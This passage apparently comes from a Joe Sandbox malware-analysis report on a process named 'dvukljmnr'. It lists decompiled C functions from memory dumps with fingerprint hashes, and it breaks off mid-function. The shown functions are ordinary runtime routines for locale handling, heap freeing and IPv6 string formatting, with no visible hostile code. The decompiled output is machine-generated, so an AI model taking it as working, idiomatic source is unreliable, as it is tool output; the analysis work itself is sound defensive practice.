                                                          • API ID: AddressEncodePointerProc$DebugDebuggerErrorLastLibraryLoadOutputPresentString
                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                          • API String ID: 1496758939-564504941
                                                          • Opcode ID: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction ID: c2a79641d0d773efffa66813ec8f0434c84026bd56148b6f04e428cfa15ca33c
                                                          • Opcode Fuzzy Hash: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction Fuzzy Hash: C211E470E1D302EBCB019BB1AD4CF6BBBBCAE857253550469F816D21A1DF34C800DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009B842D(intOrPtr _a4) {
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t54;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				void* _t66;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t54 = _a4;
                                                          				if(_t54 != 0) {
                                                          					_t2 = _t54 + 0xc; // 0xf000000
                                                          					_t56 =  *_t2 -  *0x9cee34; // 0x9d0054
                                                          					if(_t56 != 0) {
                                                          						E009B2248(_t16);
                                                          					}
                                                          					_t3 = _t54 + 0x10; // 0x254804b7
                                                          					_t57 =  *_t3 -  *0x9cee38; // 0x9d0054
                                                          					if(_t57 != 0) {
                                                          						E009B2248(_t17);
                                                          					}
                                                          					_t4 = _t54 + 0x14; // 0x8000
                                                          					_t58 =  *_t4 -  *0x9cee3c; // 0x9d0054
                                                          					if(_t58 != 0) {
                                                          						E009B2248(_t18);
                                                          					}
                                                          					_t5 = _t54 + 0x18; // 0xfc7d80
                                                          					_t59 =  *_t5 -  *0x9cee40; // 0x9d0054
                                                          					if(_t59 != 0) {
                                                          						E009B2248(_t19);
                                                          					}
                                                          					_t6 = _t54 + 0x1c; // 0x4d8b0774
                                                          					_t60 =  *_t6 -  *0x9cee44; // 0x9d0054
                                                          					if(_t60 != 0) {
                                                          						E009B2248(_t20);
                                                          					}
                                                          					_t7 = _t54 + 0x20; // 0x706183f8
                                                          					_t61 =  *_t7 -  *0x9cee48; // 0x9d0054
                                                          					if(_t61 != 0) {
                                                          						E009B2248(_t21);
                                                          					}
                                                          					_t8 = _t54 + 0x24; // 0x5de58bfd
                                                          					_t62 =  *_t8 -  *0x9cee4c; // 0x9d0054
                                                          					if(_t62 != 0) {
                                                          						E009B2248(_t22);
                                                          					}
                                                          					_t9 = _t54 + 0x38; // 0x5d595900
                                                          					_t63 =  *_t9 -  *0x9cee60; // 0x9d0058
                                                          					if(_t63 != 0) {
                                                          						E009B2248(_t23);
                                                          					}
                                                          					_t10 = _t54 + 0x3c; // 0xec8b55c3
                                                          					_t64 =  *_t10 -  *0x9cee64; // 0x9d0058
                                                          					if(_t64 != 0) {
                                                          						E009B2248(_t24);
                                                          					}
                                                          					_t11 = _t54 + 0x40; // 0x10368
                                                          					_t65 =  *_t11 -  *0x9cee68; // 0x9d0058
                                                          					if(_t65 != 0) {
                                                          						E009B2248(_t25);
                                                          					}
                                                          					_t12 = _t54 + 0x44; // 0x875ff00
                                                          					_t66 =  *_t12 -  *0x9cee6c; // 0x9d0058
                                                          					if(_t66 != 0) {
                                                          						E009B2248(_t26);
                                                          					}
                                                          					_t13 = _t54 + 0x48; // 0x401e8
                                                          					_t67 =  *_t13 -  *0x9cee70; // 0x9d0058
                                                          					if(_t67 != 0) {
                                                          						E009B2248(_t27);
                                                          					}
                                                          					_t14 = _t54 + 0x4c; // 0x5d595900
                                                          					_t15 =  *_t14;
                                                          					_t68 = _t15 -  *0x9cee74; // 0x9d0058
                                                          					if(_t68 != 0) {
                                                          						return E009B2248(_t15);
                                                          					}
                                                          				}
                                                          				return _t15;
                                                          			}



















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction ID: 057f278e9541268213c1a9db557a34ad7a81df57b44167fe861174edcd1da78a
                                                          • Opcode Fuzzy Hash: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction Fuzzy Hash: 6C213532954604ABC628EB64FE85D9773EEEA083707A44D09F11AD7561CF74FC808625
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E009B7973(void* __ebx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr _t12;
                                                          				intOrPtr _t13;
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t22;
                                                          				intOrPtr* _t42;
                                                          
                                                          				if(_a4 > 5 || _a8 == 0) {
                                                          					L4:
                                                          					return 0;
                                                          				} else {
                                                          					_t42 = E009B2280(8, 1);
                                                          					if(_t42 != 0) {
                                                          						_t12 = E009B2280(0xb8, 1);
                                                          						 *_t42 = _t12;
                                                          						__eflags = _t12;
                                                          						if(_t12 != 0) {
                                                          							_t13 = E009B2280(0x220, 1);
                                                          							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                                          							__eflags = _t13;
                                                          							if(_t13 != 0) {
                                                          								E009B7488( *_t42, 0x9ce800);
                                                          								_t15 = E009B7D73(__ebx, __edx, 1, _t42, __fp0,  *_t42, _a4, _a8);
                                                          								_push( *((intOrPtr*)(_t42 + 4)));
                                                          								__eflags = _t15;
                                                          								if(__eflags == 0) {
                                                          									L14:
                                                          									E009B2248();
                                                          									E009B4248( *_t42);
                                                          									E009B40EE( *_t42);
                                                          									E009B2248(_t42);
                                                          									_t42 = 0;
                                                          									L16:
                                                          									return _t42;
                                                          								}
                                                          								_push( *((intOrPtr*)( *_t42 + 4)));
                                                          								_t22 = E009B48E9(__edx, 1, __eflags);
                                                          								__eflags = _t22;
                                                          								if(_t22 == 0) {
                                                          									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                                          									goto L16;
                                                          								}
                                                          								_push( *((intOrPtr*)(_t42 + 4)));
                                                          								goto L14;
                                                          							}
                                                          							E009B2248( *_t42);
                                                          							E009B2248(_t42);
                                                          							L8:
                                                          							goto L3;
                                                          						}
                                                          						E009B2248(_t42);
                                                          						goto L8;
                                                          					}
                                                          					L3:
                                                          					 *((intOrPtr*)(E009AF100())) = 0xc;
                                                          					goto L4;
                                                          				}
                                                          			}












                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                          • String ID:
                                                          • API String ID: 1503006713-0
                                                          • Opcode ID: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction ID: 6dfbdb7a9998d7dbdf7fd9c75472369038a7ed211609ed7ea2d8b9231477365b
                                                          • Opcode Fuzzy Hash: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction Fuzzy Hash: 0521053514C605AEEB253FE4DE02FDABBE9DFC1770B204A2DF554950A2EA3199009791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E009B7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, signed int _a8, char _a12) {
                                                          				signed int _v8;
                                                          				signed int _v32;
                                                          				intOrPtr _v36;
                                                          				signed int _v40;
                                                          				void* _t38;
                                                          				signed int _t45;
                                                          				signed int _t60;
                                                          				intOrPtr _t77;
                                                          				void* _t80;
                                                          				intOrPtr* _t82;
                                                          				signed int _t83;
                                                          				signed int _t86;
                                                          				intOrPtr _t88;
                                                          				void* _t92;
                                                          				void* _t98;
                                                          
                                                          				_t98 = __fp0;
                                                          				_t80 = __edx;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_t86 = 0;
                                                          				if(_a12 <= 0) {
                                                          					L5:
                                                          					return _t38;
                                                          				} else {
                                                          					_push(__edi);
                                                          					_t82 =  &_a12;
                                                          					while(1) {
                                                          						_t82 = _t82 + 4;
                                                          						_t38 = E009B56BB(_a4, _a8,  *_t82);
                                                          						_t92 = _t92 + 0xc;
                                                          						if(_t38 != 0) {
                                                          							break;
                                                          						}
                                                          						_t86 = _t86 + 1;
                                                          						if(_t86 < _a12) {
                                                          							continue;
                                                          						} else {
                                                          							goto L5;
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					E009AEB49(0, _t80);
                                                          					asm("int3");
                                                          					_push(0x14);
                                                          					_push(0x9cc560);
                                                          					E009AF1E0(0, _t82, _t86);
                                                          					_t66 = 0;
                                                          					_v32 = 0;
                                                          					__eflags = _a4 - 5;
                                                          					if(_a4 <= 5) {
                                                          						_t88 = E009B0595();
                                                          						_v36 = _t88;
                                                          						E009B42E8(0, _t80, _t82, _t88, __eflags);
                                                          						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                          						_v8 = _v8 & 0;
                                                          						_t83 = E009B2280(0xb8, 1);
                                                          						_v40 = _t83;
                                                          						__eflags = _t83;
                                                          						if(_t83 != 0) {
                                                          							E009B20A9(0xc);
                                                          							_v8 = 1;
                                                          							E009B7488(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                          							_v8 = _v8 & 0x00000000;
                                                          							E009B7BBF();
                                                          							_t66 = E009B7D73(0, _t80, _t83, _t88, _t98, _t83, _a4, _a8);
                                                          							_v32 = _t66;
                                                          							__eflags = _t66;
                                                          							if(_t66 == 0) {
                                                          								E009B4248(_t83);
                                                          								_t43 = E009B40EE(_t83);
                                                          							} else {
                                                          								__eflags = _a8;
                                                          								if(_a8 != 0) {
                                                          									_t60 = E009BDB28(_a8, 0x9ce694);
                                                          									__eflags = _t60;
                                                          									if(_t60 != 0) {
                                                          										 *0x9d0050 = 1;
                                                          									}
                                                          								}
                                                          								E009B20A9(0xc);
                                                          								_v8 = 2;
                                                          								_t25 = _t88 + 0x6c; // 0x6c
                                                          								E009B4368(_t25, _t83);
                                                          								E009B4248(_t83);
                                                          								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                          								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                          									__eflags =  *0x9cee10 & 0x00000001;
                                                          									if(( *0x9cee10 & 0x00000001) == 0) {
                                                          										E009B4368(0x9ce7fc,  *((intOrPtr*)(_t88 + 0x6c)));
                                                          										_t77 =  *0x9ce7fc; // 0x9ce800
                                                          										_t32 = _t77 + 0x84; // 0x9cee28
                                                          										 *0x9cee20 =  *_t32;
                                                          										_t33 = _t77 + 0x90; // 0x9c8760
                                                          										 *0x9cee7c =  *_t33;
                                                          										_t34 = _t77 + 0x74; // 0x1
                                                          										 *0x9ce690 =  *_t34;
                                                          									}
                                                          								}
                                                          								_v8 = _v8 & 0x00000000;
                                                          								_t43 = E009B7BCE();
                                                          							}
                                                          						}
                                                          						_v8 = 0xfffffffe;
                                                          						E009B7C01(_t43, _t88);
                                                          						_t45 = _t66;
                                                          					} else {
                                                          						 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						E009AEB1E();
                                                          						_t45 = 0;
                                                          					}
                                                          					return E009AF225(_t45);
                                                          				}
                                                          				L20:
                                                          			}



















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                          • String ID:
                                                          • API String ID: 2762079118-0
                                                          • Opcode ID: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction ID: 2b4a53e4bd333c76b9562a8cfe9133d025f0b7c5dce6ab881c47875f43153c8e
                                                          • Opcode Fuzzy Hash: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction Fuzzy Hash: E141D132908309AFDB10AFE4DA42BDDB7E8EFC4334F10862DF91596182DB759641EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E009A513D(void* __eax, void* __ebx) {
                                                          				intOrPtr _t5;
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t7;
                                                          				intOrPtr _t8;
                                                          				void* _t13;
                                                          				void* _t23;
                                                          				intOrPtr* _t25;
                                                          				signed int _t26;
                                                          				signed int _t27;
                                                          
                                                          				_t13 = __ebx;
                                                          				__imp__DecodePointer( *0x9d0110);
                                                          				_t25 =  *0x9cf20c; // 0x0
                                                          				_t23 = __eax;
                                                          				if(_t25 != 0) {
                                                          					while( *_t25 != 0) {
                                                          						E009B2248( *_t25);
                                                          						_t25 = _t25 + 4;
                                                          						if(_t25 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_t25 =  *0x9cf20c; // 0x0
                                                          				}
                                                          				_push(_t13);
                                                          				E009B2248(_t25);
                                                          				_t26 =  *0x9cf208; // 0x0
                                                          				 *0x9cf20c = 0;
                                                          				if(_t26 != 0) {
                                                          					while( *_t26 != 0) {
                                                          						E009B2248( *_t26);
                                                          						_t26 = _t26 + 4;
                                                          						if(_t26 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_t26 =  *0x9cf208; // 0x0
                                                          				}
                                                          				E009B2248(_t26);
                                                          				 *0x9cf208 = 0;
                                                          				E009B2248( *0x9cf204);
                                                          				_t5 = E009B2248( *0x9cf200);
                                                          				_t27 = _t26 | 0xffffffff;
                                                          				 *0x9cf204 = 0;
                                                          				 *0x9cf200 = 0;
                                                          				if(_t23 != _t27 &&  *0x9d0110 != 0) {
                                                          					_t5 = E009B2248(_t23);
                                                          				}
                                                          				__imp__EncodePointer(_t27);
                                                          				 *0x9d0110 = _t5;
                                                          				_t6 =  *0x9cfd10; // 0x0
                                                          				if(_t6 != 0) {
                                                          					E009B2248(_t6);
                                                          					 *0x9cfd10 = 0;
                                                          				}
                                                          				_t7 =  *0x9cfd14; // 0x0
                                                          				if(_t7 != 0) {
                                                          					E009B2248(_t7);
                                                          					 *0x9cfd14 = 0;
                                                          				}
                                                          				_t8 =  *0x9cecec; // 0x9ceac8
                                                          				asm("lock xadd [eax], esi");
                                                          				if(_t27 == 1) {
                                                          					_t8 =  *0x9cecec; // 0x9ceac8
                                                          					if(_t8 != 0x9ceac8) {
                                                          						_t8 = E009B2248(_t8);
                                                          						 *0x9cecec = 0x9ceac8;
                                                          					}
                                                          				}
                                                          				return _t8;
                                                          			}













                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 3064303923-0
                                                          • Opcode ID: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction ID: 3cdadf9e88027997c62150ad835ac5599d8a008d718cf249fdcea32ed51fca6b
                                                          • Opcode Fuzzy Hash: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction Fuzzy Hash: AD21B137D692118BE725AF14FE50E9A7369F781730354063EF93493275CB346C40AB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr* _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				intOrPtr _t71;
                                                          				signed int _t78;
                                                          				signed int _t86;
                                                          				char _t90;
                                                          				signed int _t91;
                                                          				signed int _t96;
                                                          				intOrPtr _t108;
                                                          				signed int _t114;
                                                          				void* _t115;
                                                          				intOrPtr _t128;
                                                          				intOrPtr* _t129;
                                                          				void* _t130;
                                                          
                                                          				_t129 = _a4;
                                                          				_t128 = _a8;
                                                          				_t116 = 0;
                                                          				_t71 = _t128 + 0x5c;
                                                          				_v8 = 8;
                                                          				_v20 = _t71;
                                                          				if( *_t129 == 0) {
                                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                          						goto L5;
                                                          					} else {
                                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                          						if(_t96 != 0) {
                                                          							L38:
                                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                          								goto L5;
                                                          							} else {
                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                          								_t86 = L00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                          								L36:
                                                          								return _t128 + _t86 * 2;
                                                          							}
                                                          						}
                                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                          						if(_t114 == 0) {
                                                          							L33:
                                                          							_t115 = 0xa02926;
                                                          							L35:
                                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                                          							_t86 = L00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                          							goto L36;
                                                          						}
                                                          						if(_t114 != 0xffff) {
                                                          							_t116 = 0;
                                                          							goto L38;
                                                          						}
                                                          						if(_t114 != 0) {
                                                          							_t115 = 0xa09cac;
                                                          							goto L35;
                                                          						}
                                                          						goto L33;
                                                          					}
                                                          				} else {
                                                          					L5:
                                                          					_a8 = _t116;
                                                          					_a4 = _t116;
                                                          					_v12 = _t116;
                                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                                          							_v8 = 6;
                                                          						}
                                                          					}
                                                          					_t90 = _v8;
                                                          					if(_t90 <= _t116) {
                                                          						L11:
                                                          						if(_a8 - _a4 <= 1) {
                                                          							_a8 = _t116;
                                                          							_a4 = _t116;
                                                          						}
                                                          						_t91 = 0;
                                                          						if(_v8 <= _t116) {
                                                          							L22:
                                                          							if(_v8 < 8) {
                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                          								_t128 = _t128 + L00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                          							}
                                                          							return _t128;
                                                          						} else {
                                                          							L14:
                                                          							L14:
                                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                                          								if(_t91 != _t116 && _t91 != _a8) {
                                                          									_push(":");
                                                          									_push(_t71 - _t128 >> 1);
                                                          									_push(_t128);
                                                          									_t128 = _t128 + L00A37707() * 2;
                                                          									_t71 = _v20;
                                                          									_t130 = _t130 + 0xc;
                                                          								}
                                                          								_t78 = L00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                          								_t130 = _t130 + 0x10;
                                                          							} else {
                                                          								_push(L"::");
                                                          								_push(_t71 - _t128 >> 1);
                                                          								_push(_t128);
                                                          								_t78 = L00A37707();
                                                          								_t130 = _t130 + 0xc;
                                                          								_t91 = _a8 - 1;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							_t128 = _t128 + _t78 * 2;
                                                          							_t71 = _v20;
                                                          							if(_t91 >= _v8) {
                                                          								goto L22;
                                                          							}
                                                          							_t116 = 0;
                                                          							goto L14;
                                                          						}
                                                          					} else {
                                                          						_t108 = 1;
                                                          						_v16 = _t129;
                                                          						_v24 = _t90;
                                                          						do {
                                                          							if( *_v16 == _t116) {
                                                          								if(_t108 - _v12 > _a8 - _a4) {
                                                          									_a4 = _v12;
                                                          									_a8 = _t108;
                                                          								}
                                                          								_t116 = 0;
                                                          							} else {
                                                          								_v12 = _t108;
                                                          							}
                                                          							_v16 = _v16 + 2;
                                                          							_t108 = _t108 + 1;
                                                          							_t26 =  &_v24;
                                                          							 *_t26 = _v24 - 1;
                                                          						} while ( *_t26 != 0);
                                                          						goto L11;
                                                          					}
                                                          				}
                                                          			}





















                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                          • Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
                                                          • Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                          • Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E00A40554(signed int _a4, char _a8) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int* _t49;
                                                          				signed int _t51;
                                                          				signed int _t56;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				signed int _t63;
                                                          				void* _t66;
                                                          				intOrPtr _t67;
                                                          				void* _t69;
                                                          				signed int _t70;
                                                          				void* _t75;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				void* _t86;
                                                          				signed int _t93;
                                                          				signed int _t96;
                                                          				intOrPtr _t105;
                                                          				signed int _t107;
                                                          				void* _t110;
                                                          				signed int _t115;
                                                          				signed int* _t119;
                                                          				void* _t125;
                                                          				void* _t126;
                                                          				signed int _t128;
                                                          				signed int _t130;
                                                          				signed int _t138;
                                                          				signed int _t144;
                                                          				void* _t158;
                                                          				void* _t159;
                                                          				void* _t160;
                                                          
                                                          				_t96 = _a4;
                                                          				_t115 =  *(_t96 + 0x28);
                                                          				_push(_t138);
                                                          				if(_t115 < 0) {
                                                          					_t105 =  *[fs:0x18];
                                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                          						goto L6;
                                                          					} else {
                                                          						__eflags = _t115 | 0xffffffff;
                                                          						asm("lock xadd [eax], edx");
                                                          						return 1;
                                                          					}
                                                          				} else {
                                                          					L6:
                                                          					_push(_t128);
                                                          					while(1) {
                                                          						L7:
                                                          						__eflags = _t115;
                                                          						if(_t115 >= 0) {
                                                          							break;
                                                          						}
                                                          						__eflags = _a8;
                                                          						if(_a8 == 0) {
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                          							_t49 = _t96 + 0x1c;
                                                          							_t106 = 1;
                                                          							asm("lock xadd [edx], ecx");
                                                          							_t115 =  *(_t96 + 0x28);
                                                          							__eflags = _t115;
                                                          							if(_t115 < 0) {
                                                          								L23:
                                                          								_t130 = 0;
                                                          								__eflags = 0;
                                                          								while(1) {
                                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                          									asm("sbb esi, esi");
                                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
                                                          									_push(_t144);
                                                          									_push(0);
                                                          									_t51 = L009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                          									__eflags = _t51 - 0x102;
                                                          									if(_t51 != 0x102) {
                                                          										break;
                                                          									}
                                                          									_t106 =  *(_t144 + 4);
                                                          									_t126 =  *_t144;
                                                          									_t86 = L00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                          									_push(_t126);
                                                          									_push(_t86);
                                                          									L00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                          									L00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                          									_t130 = _t130 + 1;
                                                          									_t160 = _t158 + 0x28;
                                                          									__eflags = _t130 - 2;
                                                          									if(__eflags > 0) {
                                                          										E00A8217A(_t106, __eflags, _t96);
                                                          									}
                                                          									_push("RTL: Re-Waiting\n");
                                                          									_push(0);
                                                          									_push(0x65);
                                                          									L00A53F92();
                                                          									_t158 = _t160 + 0xc;
                                                          								}
                                                          								__eflags = _t51;
                                                          								if(__eflags < 0) {
                                                          									_push(_t51);
                                                          									L00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                          									asm("int3");
                                                          									while(1) {
                                                          										L32:
                                                          										__eflags = _a8;
                                                          										if(_a8 == 0) {
                                                          											break;
                                                          										}
                                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                          										_t119 = _t96 + 0x24;
                                                          										_t107 = 1;
                                                          										asm("lock xadd [eax], ecx");
                                                          										_t56 =  *(_t96 + 0x28);
                                                          										_a4 = _t56;
